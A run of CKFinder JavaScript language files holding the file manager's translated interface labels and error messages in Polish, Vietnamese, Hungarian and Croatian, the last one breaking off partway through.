thumbnailSmall : 'Mała (%s)', thumbnailMedium : 'Średnia (%s)', thumbnailLarge : 'Duża (%s)', newSize : 'Podaj nowe wymiary', width : 'Szerokość', height : 'Wysokość', invalidHeight : 'Nieprawidłowa wysokość.', invalidWidth : 'Nieprawidłowa szerokość.', invalidName : 'Nieprawidłowa nazwa pliku.', newImage : 'Utwórz nowy obrazek', noExtensionChange : 'Rozszerzenie pliku nie może zostac zmienione.', imageSmall : 'Plik źródłowy jest zbyt mały.', contextMenuName : 'Zmień rozmiar', lockRatio : 'Zablokuj proporcje', resetSize : 'Przywróć rozmiar' }, // Fileeditor plugin Fileeditor : { save : 'Zapisz', fileOpenError : 'Nie udało się otworzyć pliku.', fileSaveSuccess : 'Plik został zapisany pomyślnie.', contextMenuName : 'Edytuj', loadingFile : 'Trwa ładowanie pliku, proszę czekać...' }, Maximize : { maximize : 'Maksymalizuj', minimize : 'Minimalizuj' }, Gallery : { current : 'Obrazek {current} z {total}' }, Zip : { extractHereLabel : 'Wypakuj tutaj', extractToLabel : 'Wypakuj do...', downloadZipLabel : 'Pobierz jako zip', compressZipLabel : 'Kompresuj do zip', removeAndExtract : 'Usuń poprzedni i wypakuj', extractAndOverwrite : 'Wypakuj do bieżącego nadpisując istniejące pliki', extractSuccess : 'Plik został pomyślnie wypakowany.' } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the Vietnamese * language. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['vi'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, không khả dụng</span>', confirmCancel : 'Vài tùy chọn đã thay đổi. Bạn có muốn đóng hộp thoại?', ok : 'OK', cancel : 'Hủy', confirmationTitle : 'Xác nhận', messageTitle : 'Thông tin', inputTitle : 'Câu hỏi', undo : 'Hoàn tác', redo : 'Làm lại', skip : 'Bỏ qua', skipAll : 'Bỏ qua tất cả', makeDecision : 'Chọn hành động nào?', rememberDecision: 'Ghi nhớ quyết định này' }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'en', LangCode : 'vi', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'd/m/yyyy h:MM aa', DateAmPm : ['SA', 'CH'], // Folders FoldersTitle : 'Thư mục', FolderLoading : 'Đang tải...', FolderNew : 'Xin chọn tên cho thư mục mới: ', FolderRename : 'Xin chọn tên mới cho thư mục: ', FolderDelete : 'Bạn có chắc muốn xóa thư mục "%1"?', FolderRenaming : ' (Đang đổi tên...)', FolderDeleting : ' (Đang xóa...)', DestinationFolder : 'Destination Folder', // MISSING // Files FileRename : 'Xin nhập tên tập tin mới: ', FileRenameExt : 'Bạn có chắc muốn đổi phần mở rộng? Tập tin có thể sẽ không dùng được.', FileRenaming : 'Đang đổi tên...', FileDelete : 'Bạn có chắc muốn xóa tập tin "%1"?', FilesDelete : 'Are you sure you want to delete %1 files?', // MISSING FilesLoading : 'Đang tải...', FilesEmpty : 'Thư mục trống.', DestinationFile : 'Destination File', // MISSING SkippedFiles : 'List of skipped files:', // MISSING // Basket BasketFolder : 'Rổ', BasketClear : 'Dọn rổ', BasketRemove : 'Xóa khỏi rổ', BasketOpenFolder : 'Mở thư mục cha', BasketTruncateConfirm : 'Bạn có chắc muốn bỏ tất cả tập tin trong rổ?', BasketRemoveConfirm : 'Bạn có chắc muốn bỏ tập tin "%1" khỏi rổ?', BasketRemoveConfirmMultiple : 'Do you really want to remove %1 files from the basket?', // MISSING BasketEmpty : 'Không có tập tin trong rổ, hãy kéo và thả tập tin vào rổ.', BasketCopyFilesHere : 'Chép tập tin từ rổ', BasketMoveFilesHere : 'Chuyển tập tin từ rổ', // Global messages OperationCompletedSuccess : 'Operation completed successfully.', // MISSING OperationCompletedErrors : 'Operation completed with errors.', // MISSING FileError : '%s: %e', // MISSING // Move and Copy files MovedFilesNumber : 'Number of files moved: %s.', // MISSING CopiedFilesNumber : 'Number of files copied: %s.', // MISSING MoveFailedList : 'The following files could not be moved:<br />%s', // MISSING CopyFailedList : 'The following files could not be copied:<br />%s', // MISSING // Toolbar Buttons (some used elsewhere) Upload : 'Tải lên', UploadTip : 'Tải tập tin mới', Refresh : 'Làm tươi', Settings : 'Thiết lập', Help : 'Hướng dẫn', HelpTip : 'Hướng dẫn', // Context Menus Select : 'Chọn', SelectThumbnail : 'Chọn ảnh mẫu', View : 'Xem', Download : 'Tải về', NewSubFolder : 'Tạo thư mục con', Rename : 'Đổi tên', Delete : 'Xóa', DeleteFiles : 'Delete Files', // MISSING CopyDragDrop : 'Sao chép ở đây', MoveDragDrop : 'Di chuyển ở đây', // Dialogs RenameDlgTitle : 'Đổi tên', NewNameDlgTitle : 'Tên mới', FileExistsDlgTitle : 'Tập tin đã tồn tại', SysErrorDlgTitle : 'Lỗi hệ thống', FileOverwrite : 'Ghi đè', FileAutorename : 'Tự đổi tên', ManuallyRename : 'Manually rename', // MISSING // Generic OkBtn : 'OK', CancelBtn : 'Hủy bỏ', CloseBtn : 'Đóng', // Upload Panel UploadTitle : 'Tải tập tin mới', UploadSelectLbl : 'Chọn tập tin tải lên', UploadProgressLbl : '(Đang tải lên, vui lòng chờ...)', UploadBtn : 'Tải tập tin đã chọn', UploadBtnCancel : 'Hủy bỏ', UploadNoFileMsg : 'Xin chọn một tập tin trong máy tính.', UploadNoFolder : 'Xin chọn thư mục trước khi tải lên.', UploadNoPerms : 'Không được phép tải lên.', UploadUnknError : 'Lỗi khi tải tập tin.', UploadExtIncorrect : 'Kiểu tập tin không được chấp nhận trong thư mục này.', // Flash Uploads UploadLabel : 'Tập tin sẽ tải:', UploadTotalFiles : 'Tổng số tập tin:', UploadTotalSize : 'Dung lượng tổng cộng:', UploadSend : 'Tải lên', UploadAddFiles : 'Thêm tập tin', UploadClearFiles : 'Xóa tập tin', UploadCancel : 'Hủy tải', UploadRemove : 'Xóa', UploadRemoveTip : 'Xóa !f', UploadUploaded : 'Đã tải !n%', UploadProcessing : 'Đang xử lí...', // Settings Panel SetTitle : 'Thiết lập', SetView : 'Xem:', SetViewThumb : 'Ảnh mẫu', SetViewList : 'Danh sách', SetDisplay : 'Hiển thị:', SetDisplayName : 'Tên tập tin', SetDisplayDate : 'Ngày', SetDisplaySize : 'Dung lượng', SetSort : 'Sắp xếp:', SetSortName : 'theo tên', SetSortDate : 'theo ngày', SetSortSize : 'theo dung lượng', SetSortExtension : 'theo phần mở rộng', // Status Bar FilesCountEmpty : '<Thư mục rỗng>', FilesCountOne : '1 tập tin', FilesCountMany : '%1 tập tin', // Size and Speed Kb : '%1 KB', Mb : '%1 MB', Gb : '%1 GB', SizePerSecond : '%1/s', // Connector Error Messages. ErrorUnknown : 'Không thể hoàn tất yêu cầu. (Lỗi %1)', Errors : { 10 : 'Lệnh không hợp lệ.', 11 : 'Kiểu tài nguyên không được chỉ định trong yêu cầu.', 12 : 'Kiểu tài nguyên yêu cầu không hợp lệ.', 102 : 'Tên tập tin hay thư mục không hợp lệ.', 103 : 'Không thể hoàn tất yêu cầu vì giới hạn quyền.', 104 : 'Không thể hoàn tất yêu cầu vì giới hạn quyền của hệ thống tập tin.', 105 : 'Phần mở rộng tập tin không hợp lệ.', 109 : 'Yêu cầu không hợp lệ.', 110 : 'Lỗi không xác định.', 111 : 'It was not possible to complete the request due to resulting file size.', // MISSING 115 : 'Tập tin hoặc thư mục cùng tên đã tồn tại.', 116 : 'Không thấy thư mục. Hãy làm tươi và thử lại.', 117 : 'Không thấy tập tin. Hãy làm tươi và thử lại.', 118 : 'Đường dẫn nguồn và đích giống nhau.', 201 : 'Tập tin cùng tên đã tồn tại. Tập tin vừa tải lên được đổi tên thành "%1".', 202 : 'Tập tin không hợp lệ.', 203 : 'Tập tin không hợp lệ. Dung lượng quá lớn.', 204 : 'Tập tin tải lên bị hỏng.', 205 : 'Không có thư mục tạm để tải tập tin.', 206 : 'Huỷ tải lên vì lí do bảo mật. Tập tin chứa dữ liệu giống HTML.', 207 : 'Tập tin được đổi tên thành "%1".', 300 : 'Di chuyển tập tin thất bại.', 301 : 'Chép tập tin thất bại.', 500 : 'Trình duyệt tập tin bị vô hiệu vì lí do bảo mật. Xin liên hệ quản trị hệ thống và kiểm tra tập tin cấu hình CKFinder.', 501 : 'Chức năng hỗ trợ ảnh mẫu bị vô hiệu.' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'Không thể để trống tên tập tin.', FileExists : 'Tập tin %s đã tồn tại.', FolderEmpty : 'Không thể để trống tên thư mục.', FolderExists : 'Folder %s already exists.', // MISSING FolderNameExists : 'Folder already exists.', // MISSING FileInvChar : 'Tên tập tin không thể chưa các kí tự: \n\\ / : * ? " < > |', FolderInvChar : 'Tên thư mục không thể chứa các kí tự: \n\\ / : * ? " < > |', PopupBlockView : 'Không thể mở tập tin trong cửa sổ mới. Hãy kiểm tra trình duyệt và tắt chức năng chặn popup trên trang web này.', XmlError : 'Không thể nạp hồi đáp XML từ máy chủ web.', XmlEmpty : 'Không thể nạp hồi đáp XML từ máy chủ web. Dữ liệu rỗng.', XmlRawResponse : 'Hồi đáp thô từ máy chủ: %s' }, // Imageresize plugin Imageresize : { dialogTitle : 'Đổi kích thước %s', sizeTooBig : 'Không thể đặt chiều cao hoặc rộng to hơn kích thước gốc (%size).', resizeSuccess : 'Đổi kích thước ảnh thành công.', thumbnailNew : 'Tạo ảnh mẫu mới', thumbnailSmall : 'Nhỏ (%s)', thumbnailMedium : 'Vừa (%s)', thumbnailLarge : 'Lớn (%s)', newSize : 'Chọn kích thước mới', width : 'Rộng', height : 'Cao', invalidHeight : 'Chiều cao không hợp lệ.', invalidWidth : 'Chiều rộng không hợp lệ.', invalidName : 'Tên tập tin không hợp lệ.', newImage : 'Tạo ảnh mới', noExtensionChange : 'Không thể thay đổi phần mở rộng.', imageSmall : 'Ảnh nguồn quá nhỏ.', contextMenuName : 'Đổi kích thước', lockRatio : 'Khoá tỉ lệ', resetSize : 'Đặt lại kích thước' }, // Fileeditor plugin Fileeditor : { save : 'Lưu', fileOpenError : 'Không thể mở tập tin.', fileSaveSuccess : 'Lưu tập tin thành công.', contextMenuName : 'Sửa', loadingFile : 'Đang tải tập tin, xin chờ...' }, Maximize : { maximize : 'Cực đại hóa', minimize : 'Cực tiểu hóa' }, Gallery : { current : 'Hình thứ {current} trên {total}' }, Zip : { extractHereLabel : 'Extract here', // MISSING extractToLabel : 'Extract to...', // MISSING downloadZipLabel : 'Download as zip', // MISSING compressZipLabel : 'Compress to zip', // MISSING removeAndExtract : 'Remove existing and extract', // MISSING extractAndOverwrite : 'Extract overwriting existing files', // MISSING extractSuccess : 'File extracted successfully.' // MISSING } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the Hungarian * language. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['hu'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, nem elérhető</span>', confirmCancel : 'Az űrlap tartalma megváltozott, ám a változásokat nem rögzítette. Biztosan be szeretné zárni az űrlapot?', ok : 'Rendben', cancel : 'Mégsem', confirmationTitle : 'Megerősítés', messageTitle : 'Információ', inputTitle : 'Kérdés', undo : 'Visszavonás', redo : 'Ismétlés', skip : 'Kihagy', skipAll : 'Mindet kihagy', makeDecision : 'Mi történjen a fájllal?', rememberDecision: 'Jegyezze meg a választásomat' }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'en', LangCode : 'hu', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'yyyy.mm.dd. HH:MM', DateAmPm : ['de.', 'du.'], // Folders FoldersTitle : 'Mappák', FolderLoading : 'Betöltés...', FolderNew : 'Kérem adja meg a mappa nevét: ', FolderRename : 'Kérem adja meg a mappa új nevét: ', FolderDelete : 'Biztosan törölni szeretné a következő mappát: "%1"?', FolderRenaming : ' (átnevezés...)', FolderDeleting : ' (törlés...)', DestinationFolder : 'Cél mappa', // Files FileRename : 'Kérem adja meg a fájl új nevét: ', FileRenameExt : 'Biztosan szeretné módosítani a fájl kiterjesztését? A fájl esetleg használhatatlan lesz.', FileRenaming : 'Átnevezés...', FileDelete : 'Biztosan törli a következő fájlt: "%1"?', FilesDelete : 'Biztosan törli a kijelölt %1 fájlt?', FilesLoading : 'Betöltés...', FilesEmpty : 'A mappa üres.', DestinationFile : 'Cél fájl', SkippedFiles : 'A kihagyott fájlok listája:', // Basket BasketFolder : 'Kosár', BasketClear : 'Kosár ürítése', BasketRemove : 'Törlés a kosárból', BasketOpenFolder : 'A fájlt tartalmazó mappa megnyitása', BasketTruncateConfirm : 'Biztosan szeretne minden fájlt törölni a kosárból?', BasketRemoveConfirm : 'Biztosan törölni szeretné a(z) "%1" nevű fájlt a kosárból?', BasketRemoveConfirmMultiple : 'Biztosan törölni szeretné a kijelült %1 fájlt a kosárból?', BasketEmpty : 'Nincsenek fájlok a kosárban.', BasketCopyFilesHere : 'Fájlok másolása a kosárból', BasketMoveFilesHere : 'Fájlok áthelyezése a kosárból', // Global messages OperationCompletedSuccess : 'A művelet sikeresen befejeződött.', OperationCompletedErrors : 'A művelet közben hiba történt.', FileError : '%s: %e', // Move and Copy files MovedFilesNumber : 'Az áthelyezett fájlok száma: %s.', CopiedFilesNumber : 'A másolt fájlok száma: %s.', MoveFailedList : 'A következő fájlok nem helyezhetőek át:<br />%s', CopyFailedList : 'A következő fájlok nem másolhatóak:<br />%s', // Toolbar Buttons (some used elsewhere) Upload : 'Feltöltés', UploadTip : 'Új fájl feltöltése', Refresh : 'Frissítés', Settings : 'Beállítások', Help : 'Súgó', HelpTip : 'Súgó (angolul)', // Context Menus Select : 'Kiválaszt', SelectThumbnail : 'Bélyegkép kiválasztása', View : 'Megtekintés', Download : 'Letöltés', NewSubFolder : 'Új almappa', Rename : 'Átnevezés', Delete : 'Törlés', DeleteFiles : 'Fájlok törlése', CopyDragDrop : 'Másolás ide', MoveDragDrop : 'Áthelyezés ide', // Dialogs RenameDlgTitle : 'Átnevezés', NewNameDlgTitle : 'Új név', FileExistsDlgTitle : 'A fájl már létezik', SysErrorDlgTitle : 'Rendszerhiba', FileOverwrite : 'Felülír', FileAutorename : 'Automatikus átnevezés', ManuallyRename : 'Átnevezés', // Generic OkBtn : 'OK', CancelBtn : 'Mégsem', CloseBtn : 'Bezárás', // Upload Panel UploadTitle : 'Új fájl feltöltése', UploadSelectLbl : 'Válassza ki a feltölteni kívánt fájlt', UploadProgressLbl : '(A feltöltés folyamatban, kérem várjon...)', UploadBtn : 'A kiválasztott fájl feltöltése', UploadBtnCancel : 'Mégsem', UploadNoFileMsg : 'Kérem válassza ki a fájlt a számítógépéről.', UploadNoFolder : 'A feltöltés előtt válasszon mappát.', UploadNoPerms : 'A fájlok feltöltése nem engedélyezett.', UploadUnknError : 'Hiba a fájl feltöltése közben.', UploadExtIncorrect : 'A fájl kiterjesztése nem engedélyezett ebben a mappában.', // Flash Uploads UploadLabel : 'Feltöltendő fájlok', UploadTotalFiles : 'Összes fájl:', UploadTotalSize : 'Összméret:', UploadSend : 'Feltöltés', UploadAddFiles : 'Fájl hozzáadása', UploadClearFiles : 'Feltöltési lista törlése', UploadCancel : 'Feltöltés megszakítása', UploadRemove : 'Eltávolít', UploadRemoveTip : 'Fájl eltávolítása a listáról: !f', UploadUploaded : 'Feltöltve !n%', UploadProcessing : 'Feldolgozás...', // Settings Panel SetTitle : 'Beállítások', SetView : 'Nézet:', SetViewThumb : 'bélyegképes', SetViewList : 'listás', SetDisplay : 'Megjelenik:', SetDisplayName : 'fájl neve', SetDisplayDate : 'dátum', SetDisplaySize : 'fájlméret', SetSort : 'Rendezés:', SetSortName : 'fájlnév', SetSortDate : 'dátum', SetSortSize : 'méret', SetSortExtension : 'kiterjesztés', // Status Bar FilesCountEmpty : '<üres mappa>', FilesCountOne : '1 fájl', FilesCountMany : '%1 fájl', // Size and Speed Kb : '%1 KB', Mb : '%1 MB', Gb : '%1 GB', SizePerSecond : '%1/s', // Connector Error Messages. ErrorUnknown : 'A parancsot nem sikerült végrehajtani. (Hiba: %1)', Errors : { 10 : 'Érvénytelen parancs.', 11 : 'A fájl típusa nem lett a kérés során beállítva.', 12 : 'A kívánt fájl típus érvénytelen.', 102 : 'Érvénytelen fájl vagy könyvtárnév.', 103 : 'Hitelesítési problémák miatt nem sikerült a kérést teljesíteni.', 104 : 'Jogosultsági problémák miatt nem sikerült a kérést teljesíteni.', 105 : 'Érvénytelen fájl kiterjesztés.', 109 : 'Érvénytelen kérés.', 110 : 'Ismeretlen hiba.', 111 : 'A kérés nem teljesíthető a létrejövő fájl mérete miatt.', 115 : 'A fálj vagy mappa már létezik ezen a néven.', 116 : 'Mappa nem található. Kérem frissítsen és próbálja újra.', 117 : 'Fájl nem található. Kérem frissítsen és próbálja újra.', 118 : 'A forrás és a cél azonos.', 201 : 'Ilyen nevű fájl már létezett. A feltöltött fájl a következőre lett átnevezve: "%1".', 202 : 'Érvénytelen fájl.', 203 : 'Érvénytelen fájl. A fájl mérete túl nagy.', 204 : 'A feltöltött fájl hibás.', 205 : 'A szerveren nem található a feltöltéshez ideiglenes mappa.', 206 : 'A fájl feltötése biztonsági okból megszakadt. A fájl HTML adatokat tartalmaz.', 207 : 'El fichero subido ha sido renombrado como "%1".', 300 : 'A fájl(ok) áthelyezése sikertelen.', 301 : 'A fájl(ok) másolása sikertelen.', 500 : 'A fájl-tallózó biztonsági okok miatt nincs engedélyezve. Kérem vegye fel a kapcsolatot a rendszer üzemeltetőjével és ellenőrizze a CKFinder konfigurációs fájlt.', 501 : 'A bélyegkép támogatás nincs engedélyezve.' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'A fájl neve nem lehet üres.', FileExists : 'A(z) %s fájl már létezik.', FolderEmpty : 'A mappa neve nem lehet üres.', FolderExists : 'A(z) %s mappa már létezik.', FolderNameExists : 'A mappa létezik.', FileInvChar : 'A fájl neve nem tartalmazhatja a következő karaktereket: \n\\ / : * ? " < > |', FolderInvChar : 'A mappa neve nem tartalmazhatja a következő karaktereket: \n\\ / : * ? " < > |', PopupBlockView : 'A felugró ablak megnyitása nem sikerült. Kérem ellenőrizze a böngészője beállításait és tiltsa le a felugró ablakokat blokkoló alkalmazásait erre a honlapra.', XmlError : 'A webszervertől érkező XML válasz nem dolgozható fel megfelelően.', XmlEmpty : 'A webszervertől érkező XML válasz nem dolgozható fel. A szerver üres választ küldött.', XmlRawResponse : 'A szerver az alábbi választ adta: %s' }, // Imageresize plugin Imageresize : { dialogTitle : 'Kép átméretezése: %s', sizeTooBig : 'Nem adható meg az eredeti fájlnál nagyobb méret (%size).', resizeSuccess : 'A kép sikeresen átméretezve.', thumbnailNew : 'Új bélyegkép létrehozása', thumbnailSmall : 'Kicsi (%s)', thumbnailMedium : 'Közepes (%s)', thumbnailLarge : 'Nagy (%s)', newSize : 'Adja meg az új méretet', width : 'Szélesség', height : 'Magasság', invalidHeight : 'Érvénytelen magasság.', invalidWidth : 'Érvénytelen szélesség.', invalidName : 'Érvénytelen fájlnév.', newImage : 'Létrehozás új fotóként', noExtensionChange : 'A fájl kiterjesztése nem változtatható.', imageSmall : 'Az eredeti fotó mérete túl kicsi.', contextMenuName : 'Átméretezés', lockRatio : 'Arány megtartása', resetSize : 'Eredeti méret' }, // Fileeditor plugin Fileeditor : { save : 'Mentés', fileOpenError : 'A fájl nem nyitható meg.', fileSaveSuccess : 'A fájl sikeresen mentve.', contextMenuName : 'Szerkesztés', loadingFile : 'Fájl betöltése, kérem várjon...' }, Maximize : { maximize : 'Teljes méret', minimize : 'Kis méret' }, Gallery : { current : 'Fotó: {current} / {total}' }, Zip : { extractHereLabel : 'Kicsomagolás ide', extractToLabel : 'Kicsomagolás új mappába...', downloadZipLabel : 'Letöltés zip fájlként', compressZipLabel : 'Becsomagolás zip fájlba', removeAndExtract : 'Létező törlése és kicsomagolás', extractAndOverwrite : 'Létező felülírása és kicsomagolás', extractSuccess : 'A fájl kicsomagolása megtörtént.' } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the Croatian * language. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['hr'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, nedostupno</span>', confirmCancel : 'Neke od opcija su promjenjene. Sigurno želite zatvoriti prozor??', ok : 'U redu', cancel : 'Poništi', confirmationTitle : 'Potvrda', messageTitle : 'Informacija', inputTitle : 'Pitanje', undo : 'Poništi', redo : 'Preuredi', skip : 'Preskoči', skipAll : 'Preskoči sve', makeDecision : 'Što bi trebali napraviti?', rememberDecision: 'Zapamti moj izbor' }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'en', LangCode : 'hr', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'm/d/yyyy h:MM aa', DateAmPm : ['AM', 'PM'], // Folders FoldersTitle : 'Direktoriji', FolderLoading : 'Učitavam...', FolderNew : 'Unesite novo ime direktorija: ', FolderRename : 'Unesite novo ime direktorija: ', FolderDelete : 'Sigurno želite obrisati direktorij "%1"?', FolderRenaming : ' (Mijenjam ime...)', FolderDeleting : ' (Brišem...)', DestinationFolder : 'Destination Folder', // MISSING // Files FileRename : 'Unesite novo ime datoteke: ', FileRenameExt : 'Sigurno želite promijeniti vrstu datoteke? Datoteka može postati neiskoristiva.', FileRenaming : 'Mijenjam ime...', FileDelete : 'Sigurno želite obrisati datoteku "%1"?', FilesDelete : 'Are you sure you want to delete %1 files?', // MISSING FilesLoading : 'Učitavam...', FilesEmpty : 'Direktorij je prazan.', DestinationFile : 'Destination File', // MISSING SkippedFiles : 'List of skipped files:', // MISSING // Basket BasketFolder : 'Košara', BasketClear : 'Isprazni košaru', BasketRemove : 'Ukloni iz košare', BasketOpenFolder : 'Otvori nadređeni direktorij', BasketTruncateConfirm : 'Sigurno želite obrisati sve datoteke iz košare?', BasketRemoveConfirm : 'Sigurno želite obrisati datoteku "%1" iz košare?', BasketRemoveConfirmMultiple : 'Do you really want to remove %1 files from the basket?', // MISSING BasketEmpty : 'Nema niti jedne datoteke, ubacite koju.', BasketCopyFilesHere : 'Kopiraj datoteke iz košare', BasketMoveFilesHere : 'Premjesti datoteke iz košare', // Global messages OperationCompletedSuccess : 'Operation completed successfully.', // MISSING OperationCompletedErrors : 'Operation completed with errors.', // MISSING FileError : '%s: %e', // MISSING // Move and Copy files MovedFilesNumber : 'Number of files moved: %s.', // MISSING CopiedFilesNumber : 'Number of files copied: %s.', // MISSING MoveFailedList : 'The following files could not be moved:<br />%s', // MISSING CopyFailedList : 'The following files could not be copied:<br />%s', // MISSING // Toolbar Buttons (some used elsewhere) Upload : 'Pošalji', UploadTip : 'Pošalji nove datoteke na server', Refresh : 'Osvježi', Settings : 'Postavke', Help : 'Pomoć', HelpTip : 'Pomoć', // Context Menus Select : 'Odaberi', SelectThumbnail : 'Odaberi manju sliku', View : 'Pogledaj', Download : 'Skini', NewSubFolder : 'Novi poddirektorij', Rename : 'Promijeni naziv', Delete : 'Obriši', DeleteFiles : 'Delete Files', // MISSING CopyDragDrop : 'Kopiraj ovdje', MoveDragDrop : 'Premjesti ovdje', // Dialogs RenameDlgTitle : 'Promijeni naziv', NewNameDlgTitle : 'Novi naziv', FileExistsDlgTitle : 'Datoteka već postoji', SysErrorDlgTitle : 'Greška sustava', FileOverwrite : 'Prepiši', FileAutorename : 'Automatska promjena naziva', ManuallyRename : 'Manually rename', // MISSING // Generic OkBtn : 'U redu', CancelBtn : 'Poništi', CloseBtn : 'Zatvori', // Upload Panel UploadTitle : 'Pošalji novu datoteku', UploadSelectLbl : 'Odaberi datoteku za slanje', UploadProgressLbl : '(Slanje u tijeku, molimo pričekajte...)', UploadBtn : 'Pošalji odabranu datoteku', UploadBtnCancel : 'Poništi', UploadNoFileMsg : 'Odaberite datoteku na Vašem računalu.', UploadNoFolder : 'Odaberite direktorije prije slanja.', UploadNoPerms : 'Slanje datoteka nije dozvoljeno.', UploadUnknError : 'Greška kod slanja datoteke.', UploadExtIncorrect : 'Vrsta datoteka nije dozvoljena.', // Flash Uploads UploadLabel : 'Datoteka za slanje:', UploadTotalFiles : 'Ukupno datoteka:', UploadTotalSize : 'Ukupna veličina:', UploadSend : 'Pošalji', UploadAddFiles : 'Dodaj datoteke', UploadClearFiles : 'Izbaci datoteke', UploadCancel : 'Poništi slanje', UploadRemove : 'Ukloni', UploadRemoveTip : 'Ukloni !f', UploadUploaded : 'Poslano !n%', UploadProcessing : 'Obrađujem...', // Settings Panel SetTitle : 'Postavke', SetView : 'Pregled:', SetViewThumb : 'Mala slika', SetViewList : 'Lista', SetDisplay : 'Prikaz:', SetDisplayName : 'Naziv datoteke', SetDisplayDate : 'Datum', SetDisplaySize : 'Veličina datoteke', SetSort : 'Sortiranje:', SetSortName : 'po nazivu', SetSortDate : 'po datumu', SetSortSize : 'po veličini', SetSortExtension : 'po vrsti datoteke', // Status Bar FilesCountEmpty : '<Prazan direktorij>', FilesCountOne : '1 datoteka', FilesCountMany : '%1 datoteka', // Size and Speed Kb : '%1 KB', Mb : '%1 MB', Gb : '%1 GB', SizePerSecond : '%1/s', // Connector Error Messages. ErrorUnknown : 'Nije moguće završiti zahtjev. (Greška %1)', Errors : { 10 : 'Nepoznata naredba.', 11 : 'Nije navedena vrsta u zahtjevu.', 12 : 'Zatražena vrsta nije važeća.', 102 : 'Neispravno naziv datoteke ili direktoija.', 103 : 'Nije moguće izvršiti zahtjev zbog ograničenja pristupa.', 104 : 'Nije moguće izvršiti zahtjev zbog ograničenja postavka sustava.', 105 : 'Nedozvoljena vrsta datoteke.', 109 : 'Nedozvoljen zahtjev.', 110 : 'Nepoznata greška.', 111 : 'It was not possible to complete the request due to resulting file size.', // MISSING 115 : 'Datoteka ili direktorij s istim nazivom već postoji.', 116 : 'Direktorij nije pronađen. Osvježite stranicu i pokušajte ponovo.', 117 : 'Datoteka nije pronađena. Osvježite listu datoteka i pokušajte ponovo.', 118 : 'Putanje izvora i odredišta su jednake.', 201 : 'Datoteka s istim nazivom već postoji. Poslana datoteka je promjenjena u "%1".', 202 : 'Neispravna datoteka.', 203 : 'Neispravna datoteka. Veličina datoteke je prevelika.', 204 : 'Poslana datoteka je neispravna.', 205 : 'Ne postoji privremeni direktorij za slanje na server.', 206 : 'Slanje je poništeno zbog sigurnosnih postavki. Naziv datoteke sadrži HTML podatke.', 207 : 'Poslana datoteka je promjenjena u "%1".', 300 : 'Premještanje datoteke(a) nije uspjelo.', 301 : 'Kopiranje datoteke(a) nije uspjelo.', 500 : 'Pretraživanje datoteka nije dozvoljeno iz sigurnosnih razloga. Molimo kontaktirajte administratora sustava kako bi provjerili postavke CKFinder konfiguracijske datoteke.', 501 : 'The thumbnails support is disabled.' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'Naziv datoteke ne može biti prazan.', FileExists : 'Datoteka %s već postoji.', FolderEmpty : 'Naziv direktorija ne može biti prazan.', FolderExists : 'Folder %s already exists.', // MISSING FolderNameExists : 'Folder already exists.', // MISSING FileInvChar : 'Naziv datoteke ne smije sadržavati niti jedan od sljedećih znakova: \n\\ / : * ? " < > |', FolderInvChar : 'Naziv direktorija ne smije sadržavati niti jedan od sljedećih znakova: \n\\ / : * ? " < > |', PopupBlockView : 'Nije moguće otvoriti datoteku u novom prozoru. Promijenite postavke svog Internet preglednika i isključite sve popup blokere za ove web stranice.', XmlError : 'Nije moguće učitati XML odgovor od web servera.', XmlEmpty : 'Nije moguće učitati XML odgovor od web servera. Server je vratio prazan odgovor.', XmlRawResponse : 'Odgovor servera: %s' }, // Imageresize plugin Imageresize : { dialogTitle : 'Promijeni veličinu %s', sizeTooBig : 'Nije moguće postaviti veličinu veću od originala (%size).', resizeSuccess : 'Slika je uspješno promijenjena.', thumbnailNew : 'Napravi malu sliku', 